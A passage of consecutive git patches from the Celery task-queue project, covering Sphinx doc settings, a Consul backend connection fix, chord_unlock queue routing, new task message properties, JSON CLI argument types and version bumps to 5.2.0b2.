-For example if the client imports the module ``"myapp.tasks"``
-as ``".tasks"``, and the worker imports the module as ``"myapp.tasks"``,
-the generated names won't match and an :exc:`~@NotRegistered` error will
-be raised by the worker.
-
-This is also the case when using Django and using ``project.myapp``-style
-naming in ``INSTALLED_APPS``:
-
-.. code-block:: python
-
- INSTALLED_APPS = ['project.myapp']
-
-If you install the app under the name ``project.myapp`` then the
-tasks module will be imported as ``project.myapp.tasks``,
-so you must make sure you always import the tasks using the same name:
-
-.. code-block:: pycon
-
- >>> from project.myapp.tasks import mytask # << GOOD
-
- >>> from myapp.tasks import mytask # << BAD!!!
-
-The second example will cause the task to be named differently
-since the worker and the client imports the modules under different names:
-
-.. code-block:: pycon
-
- >>> from project.myapp.tasks import mytask
- >>> mytask.name
- 'project.myapp.tasks.mytask'
-
- >>> from myapp.tasks import mytask
- >>> mytask.name
- 'myapp.tasks.mytask'
-
-For this reason you must be consistent in how you
-import modules, and that is also a Python best practice.
-
-Similarly, you shouldn't use old-style relative imports:
-
-.. code-block:: python
-
- from module import foo # BAD!
-
- from proj.module import foo # GOOD!
-
-New-style relative imports are fine and can be used:
-
-.. code-block:: python
-
- from .module import foo # GOOD!
-
-If you want to use Celery with a project already using these patterns
-extensively and you don't have the time to refactor the existing code
-then you can consider specifying the names explicitly instead of relying
-on the automatic naming:
-
-.. code-block:: python
-
- @app.task(name='proj.tasks.add')
- def add(x, y):
- return x + y
-
.. _task-name-generator-info:
Changing the automatic naming behavior
From b25123584a51ef34acd7a48d037a3b56f72699ff Mon Sep 17 00:00:00 2001
From: Alejandro Solda <43531535+alesolda@users.noreply.github.com>
Date: Mon, 9 Aug 2021 11:07:57 -0300
Subject: [PATCH 034/177] Adjust sphinx settings
Change deprecated config ":show-nested:" setting in favor of ":nested:"
as per used sphinx-click 2.5.0 version.
Remove empty page "celery.bin.amqp.html" ("celery.bin.amqp" only now
has click documentation shown in "reference/cli.html").
Relates: #6902 #6905
---
docs/reference/celery.bin.amqp.rst | 11 -----------
docs/reference/cli.rst | 2 +-
2 files changed, 1 insertion(+), 12 deletions(-)
delete mode 100644 docs/reference/celery.bin.amqp.rst
diff --git a/docs/reference/celery.bin.amqp.rst b/docs/reference/celery.bin.amqp.rst
deleted file mode 100644
index 8de8bf00de7..00000000000
--- a/docs/reference/celery.bin.amqp.rst
+++ /dev/null
@@ -1,11 +0,0 @@
-===========================================================
- ``celery.bin.amqp``
-===========================================================
-
-.. contents::
- :local:
-.. currentmodule:: celery.bin.amqp
-
-.. automodule:: celery.bin.amqp
- :members:
- :undoc-members:
diff --git a/docs/reference/cli.rst b/docs/reference/cli.rst
index cff2291d4ed..6432b7e300a 100644
--- a/docs/reference/cli.rst
+++ b/docs/reference/cli.rst
@@ -4,4 +4,4 @@
.. click:: celery.bin.celery:celery
:prog: celery
- :show-nested:
+ :nested: full
From 6405ebc62348d4c1c48334cd4dff5e21233bea2f Mon Sep 17 00:00:00 2001
From: Alejandro Solda <43531535+alesolda@users.noreply.github.com>
Date: Thu, 5 Aug 2021 15:15:10 -0300
Subject: [PATCH 035/177] Allow using non-true values in app kwargs
Trying to instantiate Celery app with non-true kwargs will not work
for those configs which have True as default, for example,
this will not have effect:
>>> app = Celery(task_create_missing_queues=False)
>>> app.conf['task_create_missing_queues']
True
This fix simply changes the filtering which from now on will discard
None values only.
Fixes: #6865
---
celery/app/base.py | 2 +-
t/unit/app/test_app.py | 6 +++++-
2 files changed, 6 insertions(+), 2 deletions(-)
diff --git a/celery/app/base.py b/celery/app/base.py
index f9ac8c18818..3df9577dbe1 100644
--- a/celery/app/base.py
+++ b/celery/app/base.py
@@ -323,7 +323,7 @@ def on_init(self):
"""Optional callback called at init."""
def __autoset(self, key, value):
- if value:
+ if value is not None:
self._preconf[key] = value
self._preconf_set_by_auto.add(key)
diff --git a/t/unit/app/test_app.py b/t/unit/app/test_app.py
index 33b34c00dae..215e200dd45 100644
--- a/t/unit/app/test_app.py
+++ b/t/unit/app/test_app.py
@@ -274,7 +274,11 @@ def test_with_broker(self, patching):
with self.Celery(broker='foo://baribaz') as app:
assert app.conf.broker_url == 'foo://baribaz'
- def test_pending_confugration__kwargs(self):
+ def test_pending_configuration_non_true__kwargs(self):
+ with self.Celery(task_create_missing_queues=False) as app:
+ assert app.conf.task_create_missing_queues is False
+
+ def test_pending_configuration__kwargs(self):
with self.Celery(foo='bar') as app:
assert app.conf.foo == 'bar'
From e963ba6a295dadcff746e8f64fd5c98a1c65231f Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 9 Aug 2021 16:28:02 +0000
Subject: [PATCH 036/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/pyupgrade: v2.23.1 → v2.23.3](https://github.com/asottile/pyupgrade/compare/v2.23.1...v2.23.3)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 705d6f859ae..4781a27634d 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/asottile/pyupgrade
- rev: v2.23.1
+ rev: v2.23.3
hooks:
- id: pyupgrade
args: ["--py36-plus"]
From 994ced05da08cf152454322a67331ac2da953fae Mon Sep 17 00:00:00 2001
From: ShaheedHaque
Date: Wed, 11 Aug 2021 10:50:59 +0100
Subject: [PATCH 037/177] The Consul backend must correctly associate requests
and responses (#6823)
* As per #5605, the Consul backend does not cleanly associate responses
from Consul with the outbound Celery request that caused it. This leaves
it prone to mistaking the (final) response from an operation N as the
response to an (early) part of operation N + 1.
This changes fix that by using a separate connection for each request.
That of course has the downside of (a) being relatively expensive and (b)
increasing the rate of connection requests into Consul:
- The former is annoying, but at least the backend works reliably.
- The latter can cause Consul to reject excessive connection attempt, but
if it does, at least it returns a clear indication of this (IIRC, it
responds with an HTTP 429"too many connections" indication).
Additionally, this issue can be ameliorated by enabling retries in the
python-consul2 (which I believe should be turned on regards less to handle
transient network issues). This is fixed by the PR in
https:/github.com/poppyred/python-consul2/pull/31.
Note that we have never seen (b) outside a test specifically trying to hammer
the system, but we see (a) all the time in our normal system tests.
To opt-out from the new behaviour add a parameter "one_client=1" to the
connection URL.
* Increase code coverage.
* Rewrite Consul backend documentation, and describe the options now
available.
---
celery/backends/consul.py | 40 ++++++++++++++++++---------
docs/userguide/configuration.rst | 46 +++++++++++++++++++++++++++++---
t/unit/backends/test_consul.py | 15 +++++++++--
3 files changed, 83 insertions(+), 18 deletions(-)
diff --git a/celery/backends/consul.py b/celery/backends/consul.py
index 106953a1271..a4ab148469c 100644
--- a/celery/backends/consul.py
+++ b/celery/backends/consul.py
@@ -31,7 +31,6 @@ class ConsulBackend(KeyValueStoreBackend):
supports_autoexpire = True
- client = None
consistency = 'consistent'
path = None
@@ -40,15 +39,33 @@ def __init__(self, *args, **kwargs):
if self.consul is None:
raise ImproperlyConfigured(CONSUL_MISSING)
-
+ #
+ # By default, for correctness, we use a client connection per
+ # operation. If set, self.one_client will be used for all operations.
+ # This provides for the original behaviour to be selected, and is
+ # also convenient for mocking in the unit tests.
+ #
+ self.one_client = None
self._init_from_params(**parse_url(self.url))
def _init_from_params(self, hostname, port, virtual_host, **params):
logger.debug('Setting on Consul client to connect to %s:%d',
hostname, port)
self.path = virtual_host
- self.client = consul.Consul(host=hostname, port=port,
- consistency=self.consistency)
+ self.hostname = hostname
+ self.port = port
+ #
+ # Optionally, allow a single client connection to be used to reduce
+ # the connection load on Consul by adding a "one_client=1" parameter
+ # to the URL.
+ #
+ if params.get('one_client', None):
+ self.one_client = self.client()
+
+ def client(self):
+ return self.one_client or consul.Consul(host=self.hostname,
+ port=self.port,
+ consistency=self.consistency)
def _key_to_consul_key(self, key):
key = bytes_to_str(key)
@@ -58,7 +75,7 @@ def get(self, key):
key = self._key_to_consul_key(key)
logger.debug('Trying to fetch key %s from Consul', key)
try:
- _, data = self.client.kv.get(key)
+ _, data = self.client().kv.get(key)
return data['Value']
except TypeError:
pass
@@ -84,17 +101,16 @@ def set(self, key, value):
logger.debug('Trying to create Consul session %s with TTL %d',
session_name, self.expires)
- session_id = self.client.session.create(name=session_name,
- behavior='delete',
- ttl=self.expires)
+ client = self.client()
+ session_id = client.session.create(name=session_name,
+ behavior='delete',
+ ttl=self.expires)
logger.debug('Created Consul session %s', session_id)
logger.debug('Writing key %s to Consul', key)
- return self.client.kv.put(key=key,
- value=value,
- acquire=session_id)
+ return client.kv.put(key=key, value=value, acquire=session_id)
def delete(self, key):
key = self._key_to_consul_key(key)
logger.debug('Removing key %s from Consul', key)
- return self.client.kv.delete(key)
+ return self.client().kv.delete(key)
diff --git a/docs/userguide/configuration.rst b/docs/userguide/configuration.rst
index e225eb1fe76..68207482b8e 100644
--- a/docs/userguide/configuration.rst
+++ b/docs/userguide/configuration.rst
@@ -2016,14 +2016,52 @@ without any further configuration. For larger clusters you could use NFS,
Consul K/V store backend settings
---------------------------------
-The Consul backend can be configured using a URL, for example:
+.. note::
+
+ The Consul backend requires the :pypi:`python-consul2` library:
+
+ To install this package use :command:`pip`:
+
+ .. code-block:: console
+
+ $ pip install python-consul2
+
+The Consul backend can be configured using a URL, for example::
CELERY_RESULT_BACKEND = 'consul://localhost:8500/'
-The backend will storage results in the K/V store of Consul
-as individual keys.
+or::
+
+ result_backend = 'consul://localhost:8500/'
+
+The backend will store results in the K/V store of Consul
+as individual keys. The backend supports auto expire of results using TTLs in
+Consul. The full syntax of the URL is::
+
+ consul://host:port[?one_client=1]
+
+The URL is formed out of the following parts:
+
+* ``host``
+
+ Host name of the Consul server.
+
+* ``port``
+
+ The port the Consul server is listening to.
+
+* ``one_client``
+
+ By default, for correctness, the backend uses a separate client connection
+ per operation. In cases of extreme load, the rate of creation of new
+ connections can cause HTTP 429 "too many connections" error responses from
+ the Consul server when under load. The recommended way to handle this is to
+ enable retries in ``python-consul2`` using the patch at
+ https://github.com/poppyred/python-consul2/pull/31.
-The backend supports auto expire of results using TTLs in Consul.
+ Alternatively, if ``one_client`` is set, a single client connection will be
+ used for all operations instead. This should eliminate the HTTP 429 errors,
+ but the storage of results in the backend can become unreliable.
.. _conf-messaging:
diff --git a/t/unit/backends/test_consul.py b/t/unit/backends/test_consul.py
index 4e13ab9d8a5..61fb5d41afd 100644
--- a/t/unit/backends/test_consul.py
+++ b/t/unit/backends/test_consul.py
@@ -22,10 +22,21 @@ def test_consul_consistency(self):
def test_get(self):
index = 100
data = {'Key': 'test-consul-1', 'Value': 'mypayload'}
- self.backend.client = Mock(name='c.client')
- self.backend.client.kv.get.return_value = (index, data)
+ self.backend.one_client = Mock(name='c.client')
+ self.backend.one_client.kv.get.return_value = (index, data)
assert self.backend.get(data['Key']) == 'mypayload'
+ def test_set(self):
+ self.backend.one_client = Mock(name='c.client')
+ self.backend.one_client.session.create.return_value = 'c8dfa770-4ea3-2ee9-d141-98cf0bfe9c59'
+ self.backend.one_client.kv.put.return_value = True
+ assert self.backend.set('Key', 'Value') is True
+
+ def test_delete(self):
+ self.backend.one_client = Mock(name='c.client')
+ self.backend.one_client.kv.delete.return_value = True
+ assert self.backend.delete('Key') is True
+
def test_index_bytes_key(self):
key = 'test-consul-2'
assert self.backend._key_to_consul_key(key) == key
From 04771d65597f62ccf2f9d901c0d1f7c1d0f24d42 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Wed, 11 Aug 2021 16:59:17 +0300
Subject: [PATCH 038/177] =?UTF-8?q?Bump=20version:=205.1.2=20=E2=86=92=205?=
=?UTF-8?q?.2.0b1?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.bumpversion.cfg | 2 +-
README.rst | 6 +++---
celery/__init__.py | 2 +-
docs/includes/introduction.txt | 2 +-
4 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index 2f0f5ef58af..66f73487a30 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.1.2
+current_version = 5.2.0b1
commit = True
tag = True
parse = (?P\d+)\.(?P\d+)\.(?P\d+)(?P[a-z\d]+)?
diff --git a/README.rst b/README.rst
index a4f05abf96d..462f53ce29c 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.1.2 (sun-harmonics)
+:Version: 5.2.0b1 (sun-harmonics)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
@@ -57,7 +57,7 @@ in such a way that the client enqueues an URL to be requested by a worker.
What do I need?
===============
-Celery version 5.1.2 runs on,
+Celery version 5.2.0b1 runs on,
- Python (3.6, 3.7, 3.8, 3.9)
- PyPy3.6 (7.6)
@@ -89,7 +89,7 @@ Get Started
===========
If this is the first time you're trying to use Celery, or you're
-new to Celery 5.0.5 or 5.1.2 coming from previous versions then you should read our
+new to Celery 5.0.5 or 5.2.0b1 coming from previous versions then you should read our
getting started tutorials:
- `First steps with Celery`_
diff --git a/celery/__init__.py b/celery/__init__.py
index cc6b3dca870..9dc6c3ce484 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -17,7 +17,7 @@
SERIES = 'sun-harmonics'
-__version__ = '5.1.2'
+__version__ = '5.2.0b1'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 56eba4c83d6..600b48da6a9 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,4 +1,4 @@
-:Version: 5.1.2 (cliffs)
+:Version: 5.2.0b1 (cliffs)
:Web: http://celeryproject.org/
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
From e6b1c67f05e6941dcb160e951ee4ce21c885ef19 Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Sat, 14 Aug 2021 10:56:12 +0100
Subject: [PATCH 039/177] Test windows on py3.10rc1 and pypy3.7 (#6868)
* test on Windows with py3.9+
* skip couchbase on python win32 >= 3.10
* temporarily disable rust on win pypy
* fix couchbase conditional syntax
* fix rust condition
* continue ignoring pypy on windows for now
* remove redundant passenv
* skip eventlet tests on windows 3.9+
* eventlet hangs on 3.6+ windows
* cryptography now has pypy3.7 wheels
* upgrade to rc py3.10
* add trove classifier for py3.10
* bump timeout for pypy
---
.github/workflows/python-package.yml | 11 +++--------
requirements/extras/couchbase.txt | 2 +-
setup.py | 1 +
t/unit/backends/test_asynchronous.py | 5 +++++
4 files changed, 10 insertions(+), 9 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 8ab6c68e6c5..41b525ca2cb 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -24,16 +24,11 @@ jobs:
strategy:
fail-fast: false
matrix:
- python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-beta.4', 'pypy-3.6', 'pypy-3.7']
+ python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-rc.1', 'pypy-3.6', 'pypy-3.7']
os: ["ubuntu-20.04", "windows-2019"]
exclude:
- - os: windows-2019
- python-version: 'pypy-3.7'
- os: windows-2019
python-version: 'pypy-3.6'
- - os: windows-2019
- python-version: "3.10.0-beta.4"
- continue-on-error: ${{ startsWith(matrix.python-version, '3.10.0-beta.') }}
steps:
- name: Install apt packages
@@ -64,8 +59,8 @@ jobs:
- name: >
Run tox for
"${{ matrix.python-version }}-unit"
- timeout-minutes: 15
- run: >
+ timeout-minutes: 20
+ run: |
tox --verbose --verbose
- uses: codecov/codecov-action@v1
diff --git a/requirements/extras/couchbase.txt b/requirements/extras/couchbase.txt
index f72a0af01d4..a86b71297ab 100644
--- a/requirements/extras/couchbase.txt
+++ b/requirements/extras/couchbase.txt
@@ -1 +1 @@
-couchbase>=3.0.0; platform_python_implementation!='PyPy'
+couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
diff --git a/setup.py b/setup.py
index 9022141035e..7a760178a65 100644
--- a/setup.py
+++ b/setup.py
@@ -192,6 +192,7 @@ def run_tests(self):
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
+ "Programming Language :: Python :: 3.10",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Operating System :: OS Independent"
diff --git a/t/unit/backends/test_asynchronous.py b/t/unit/backends/test_asynchronous.py
index df25a683bc3..c0fe894900a 100644
--- a/t/unit/backends/test_asynchronous.py
+++ b/t/unit/backends/test_asynchronous.py
@@ -1,5 +1,6 @@
import os
import socket
+import sys
import threading
import time
from unittest.mock import Mock, patch
@@ -141,6 +142,10 @@ def test_drain_timeout(self):
assert on_interval.call_count < 20, 'Should have limited number of calls to on_interval'
+@pytest.mark.skipif(
+ sys.platform == "win32",
+ reason="hangs forever intermittently on windows"
+)
class test_EventletDrainer(DrainerTests):
@pytest.fixture(autouse=True)
def setup_drainer(self):
From 38a645ddf13edfb1f630f54ba9fb6f7868ffbe01 Mon Sep 17 00:00:00 2001
From: MelnykR
Date: Sun, 15 Aug 2021 20:19:56 +0300
Subject: [PATCH 040/177] Route chord_unlock task to the same queue as chord
body (#6896)
* Route chord_unlock task to the same queue as chord body
* fix existing tests
* add case to cover bugfix
---
celery/backends/base.py | 6 ++++++
t/unit/backends/test_base.py | 14 ++++++++++++--
2 files changed, 18 insertions(+), 2 deletions(-)
diff --git a/celery/backends/base.py b/celery/backends/base.py
index 6c046028c57..91327ea2190 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -646,6 +646,12 @@ def fallback_chord_unlock(self, header_result, body, countdown=1,
body_type = None
queue = body.options.get('queue', getattr(body_type, 'queue', None))
+
+ if queue is None:
+ # fallback to default routing if queue name was not
+ # explicitly passed to body callback
+ queue = self.app.amqp.router.route(kwargs, body.name)['queue'].name
+
priority = body.options.get('priority', getattr(body_type, 'priority', 0))
self.app.tasks['celery.chord_unlock'].apply_async(
(header_result.id, body,), kwargs,
diff --git a/t/unit/backends/test_base.py b/t/unit/backends/test_base.py
index 5d04e8a7d03..9023dc14e57 100644
--- a/t/unit/backends/test_base.py
+++ b/t/unit/backends/test_base.py
@@ -206,7 +206,17 @@ def test_chord_unlock_queue(self, unlock='celery.chord_unlock'):
self.b.apply_chord(header_result_args, body)
called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
- assert called_kwargs['queue'] is None
+ assert called_kwargs['queue'] == 'testcelery'
+
+ routing_queue = Mock()
+ routing_queue.name = "routing_queue"
+ self.app.amqp.router.route = Mock(return_value={
+ "queue": routing_queue
+ })
+ self.b.apply_chord(header_result_args, body)
+ assert self.app.amqp.router.route.call_args[0][1] == body.name
+ called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
+ assert called_kwargs["queue"] == "routing_queue"
self.b.apply_chord(header_result_args, body.set(queue='test_queue'))
called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
@@ -228,7 +238,7 @@ def callback_different_app(result):
callback_different_app_signature = self.app.signature('callback_different_app')
self.b.apply_chord(header_result_args, callback_different_app_signature)
called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
- assert called_kwargs['queue'] is None
+ assert called_kwargs['queue'] == 'routing_queue'
callback_different_app_signature.set(queue='test_queue_three')
self.b.apply_chord(header_result_args, callback_different_app_signature)
From 8bff3073cb58326f75d3194a04c5e089ee7abe97 Mon Sep 17 00:00:00 2001
From: InvalidInterrupt
Date: Tue, 17 Aug 2021 03:15:55 -0700
Subject: [PATCH 041/177] Add message properties to app.tasks.Context (#6818)
* celery.worker.request.Request needs to shallow copy headers to avoid
creating a circular reference when inserting properties
---
CONTRIBUTORS.txt | 1 +
celery/app/task.py | 1 +
celery/worker/request.py | 4 +++-
docs/userguide/tasks.rst | 5 +++++
t/integration/tasks.py | 5 +++++
t/integration/test_tasks.py | 8 +++++++-
6 files changed, 22 insertions(+), 2 deletions(-)
diff --git a/CONTRIBUTORS.txt b/CONTRIBUTORS.txt
index 9a1f42338e8..fa80335e9c9 100644
--- a/CONTRIBUTORS.txt
+++ b/CONTRIBUTORS.txt
@@ -281,5 +281,6 @@ Frazer McLean, 2020/09/29
Henrik Bruåsdal, 2020/11/29
Tom Wojcik, 2021/01/24
Ruaridh Williamson, 2021/03/09
+Garry Lawrence, 2021/06/19
Patrick Zhang, 2017/08/19
Konstantin Kochin, 2021/07/11
diff --git a/celery/app/task.py b/celery/app/task.py
index 88f34889255..06366d73ed1 100644
--- a/celery/app/task.py
+++ b/celery/app/task.py
@@ -85,6 +85,7 @@ class Context:
loglevel = None
origin = None
parent_id = None
+ properties = None
retries = 0
reply_to = None
root_id = None
diff --git a/celery/worker/request.py b/celery/worker/request.py
index c30869bddbf..59bf143feac 100644
--- a/celery/worker/request.py
+++ b/celery/worker/request.py
@@ -93,7 +93,8 @@ def __init__(self, message, on_ack=noop,
maybe_make_aware=maybe_make_aware,
maybe_iso8601=maybe_iso8601, **opts):
self._message = message
- self._request_dict = message.headers if headers is None else headers
+ self._request_dict = (message.headers.copy() if headers is None
+ else headers.copy())
self._body = message.body if body is None else body
self._app = app
self._utc = utc
@@ -157,6 +158,7 @@ def __init__(self, message, on_ack=noop,
'redelivered': delivery_info.get('redelivered'),
}
self._request_dict.update({
+ 'properties': properties,
'reply_to': properties.get('reply_to'),
'correlation_id': properties.get('correlation_id'),
'hostname': self._hostname,
diff --git a/docs/userguide/tasks.rst b/docs/userguide/tasks.rst
index 60e2acf7f9d..0fb1f2463aa 100644
--- a/docs/userguide/tasks.rst
+++ b/docs/userguide/tasks.rst
@@ -372,6 +372,11 @@ The request defines the following attributes:
current task. If using version one of the task protocol the chain
tasks will be in ``request.callbacks`` instead.
+.. versionadded:: 5.2
+
+:properties: Mapping of message properties received with this task message
+ (may be :const:`None` or :const:`{}`)
+
Example
-------
diff --git a/t/integration/tasks.py b/t/integration/tasks.py
index 8d1119b6302..c8edb01d977 100644
--- a/t/integration/tasks.py
+++ b/t/integration/tasks.py
@@ -306,6 +306,11 @@ def return_priority(self, *_args):
return "Priority: %s" % self.request.delivery_info['priority']
+@shared_task(bind=True)
+def return_properties(self):
+ return self.request.properties
+
+
class ClassBasedAutoRetryTask(Task):
name = 'auto_retry_class_task'
autoretry_for = (ValueError,)
diff --git a/t/integration/test_tasks.py b/t/integration/test_tasks.py
index c7c41214e54..5596e2986bf 100644
--- a/t/integration/test_tasks.py
+++ b/t/integration/test_tasks.py
@@ -9,7 +9,8 @@
from .conftest import get_active_redis_channels
from .tasks import (ClassBasedAutoRetryTask, ExpectedException, add,
add_ignore_result, add_not_typed, fail, print_unicode,
- retry, retry_once, retry_once_priority, sleeping)
+ retry, retry_once, retry_once_priority, return_properties,
+ sleeping)
TIMEOUT = 10
@@ -270,6 +271,11 @@ def test_unicode_task(self, manager):
timeout=TIMEOUT, propagate=True,
)
+ @flaky
+ def test_properties(self, celery_session_worker):
+ res = return_properties.apply_async(app_id="1234")
+ assert res.get(timeout=TIMEOUT)["app_id"] == "1234"
+
class tests_task_redis_result_backend:
def setup(self, manager):
From cd283b6228f69a5dc0d4d3f06c6c9ec308f6fc5f Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Tue, 17 Aug 2021 13:34:33 +0100
Subject: [PATCH 042/177] handle already converted LogLevel and JSON (#6915)
* handle already converted LogLevel
* also handle JSON convert
---
celery/bin/base.py | 43 ++++++++++++++++++++++++++++++++++++++-----
celery/bin/call.py | 9 +++++----
2 files changed, 43 insertions(+), 9 deletions(-)
diff --git a/celery/bin/base.py b/celery/bin/base.py
index 95af1a89316..30358dd8a9a 100644
--- a/celery/bin/base.py
+++ b/celery/bin/base.py
@@ -1,5 +1,6 @@
"""Click customizations for Celery."""
import json
+import numbers
from collections import OrderedDict
from functools import update_wrapper
from pprint import pformat
@@ -193,17 +194,45 @@ def convert(self, value, param, ctx):
return text.str_to_list(value)
-class Json(ParamType):
- """JSON formatted argument."""
+class JsonArray(ParamType):
+ """JSON formatted array argument."""
- name = "json"
+ name = "json array"
def convert(self, value, param, ctx):
+ if isinstance(value, list):
+ return value
+
try:
- return json.loads(value)
+ v = json.loads(value)
except ValueError as e:
self.fail(str(e))
+ if not isinstance(v, list):
+ self.fail(f"{value} was not an array")
+
+ return v
+
+
+class JsonObject(ParamType):
+ """JSON formatted object argument."""
+
+ name = "json object"
+
+ def convert(self, value, param, ctx):
+ if isinstance(value, dict):
+ return value
+
+ try:
+ v = json.loads(value)
+ except ValueError as e:
+ self.fail(str(e))
+
+ if not isinstance(v, dict):
+ self.fail(f"{value} was not an object")
+
+ return v
+
class ISO8601DateTime(ParamType):
"""ISO 8601 Date Time argument."""
@@ -242,12 +271,16 @@ def __init__(self):
super().__init__(('DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL', 'FATAL'))
def convert(self, value, param, ctx):
+ if isinstance(value, numbers.Integral):
+ return value
+
value = value.upper()
value = super().convert(value, param, ctx)
return mlevel(value)
-JSON = Json()
+JSON_ARRAY = JsonArray()
+JSON_OBJECT = JsonObject()
ISO8601 = ISO8601DateTime()
ISO8601_OR_FLOAT = ISO8601DateTimeOrFloat()
LOG_LEVEL = LogLevel()
diff --git a/celery/bin/call.py b/celery/bin/call.py
index 35ca34e3f33..a04651bdd4f 100644
--- a/celery/bin/call.py
+++ b/celery/bin/call.py
@@ -1,8 +1,9 @@
"""The ``celery call`` program used to send tasks from the command-line."""
import click
-from celery.bin.base import (ISO8601, ISO8601_OR_FLOAT, JSON, CeleryCommand,
- CeleryOption, handle_preload_options)
+from celery.bin.base import (ISO8601, ISO8601_OR_FLOAT, JSON_ARRAY,
+ JSON_OBJECT, CeleryCommand, CeleryOption,
+ handle_preload_options)
@click.command(cls=CeleryCommand)
@@ -10,14 +11,14 @@
@click.option('-a',
'--args',
cls=CeleryOption,
- type=JSON,
+ type=JSON_ARRAY,
default='[]',
help_group="Calling Options",
help="Positional arguments.")
@click.option('-k',
'--kwargs',
cls=CeleryOption,
- type=JSON,
+ type=JSON_OBJECT,
default='{}',
help_group="Calling Options",
help="Keyword arguments.")
From 12f68d911d7fc50e48afd5483633f4e14d8a72df Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 17 Aug 2021 17:23:53 +0300
Subject: [PATCH 043/177] 5.2 is codenamed dawn-chorus.
---
README.rst | 4 ++--
celery/__init__.py | 2 +-
2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/README.rst b/README.rst
index 462f53ce29c..90603158407 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.2.0b1 (sun-harmonics)
+:Version: 5.2.0b1 (dawn-chorus)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
@@ -105,7 +105,7 @@ getting started tutorials:
.. _`Next steps`:
http://docs.celeryproject.org/en/latest/getting-started/next-steps.html
-
+
You can also get started with Celery by using a hosted broker transport CloudAMQP. The largest hosting provider of RabbitMQ is a proud sponsor of Celery.
Celery is...
diff --git a/celery/__init__.py b/celery/__init__.py
index 9dc6c3ce484..df89bf8936f 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -15,7 +15,7 @@
# Lazy loading
from . import local
-SERIES = 'sun-harmonics'
+SERIES = 'dawn-chorus'
__version__ = '5.2.0b1'
__author__ = 'Ask Solem'
From 2ac331026fab3d40ba1b2d106058356c30b48cb6 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 17 Aug 2021 17:34:33 +0300
Subject: [PATCH 044/177] =?UTF-8?q?Bump=20version:=205.2.0b1=20=E2=86=92?=
=?UTF-8?q?=205.2.0b2?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.bumpversion.cfg | 2 +-
README.rst | 6 +++---
celery/__init__.py | 2 +-
docs/includes/introduction.txt | 2 +-
4 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index 66f73487a30..90de144c22e 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.2.0b1
+current_version = 5.2.0b2
commit = True
tag = True
parse = (?P\d+)\.(?P\d+)\.(?P\d+)(?P[a-z\d]+)?
diff --git a/README.rst b/README.rst
index 90603158407..ac0f3e31150 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.2.0b1 (dawn-chorus)
+:Version: 5.2.0b2 (dawn-chorus)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
@@ -57,7 +57,7 @@ in such a way that the client enqueues an URL to be requested by a worker.
What do I need?
===============
-Celery version 5.2.0b1 runs on,
+Celery version 5.2.0b2 runs on,
- Python (3.6, 3.7, 3.8, 3.9)
- PyPy3.6 (7.6)
@@ -89,7 +89,7 @@ Get Started
===========
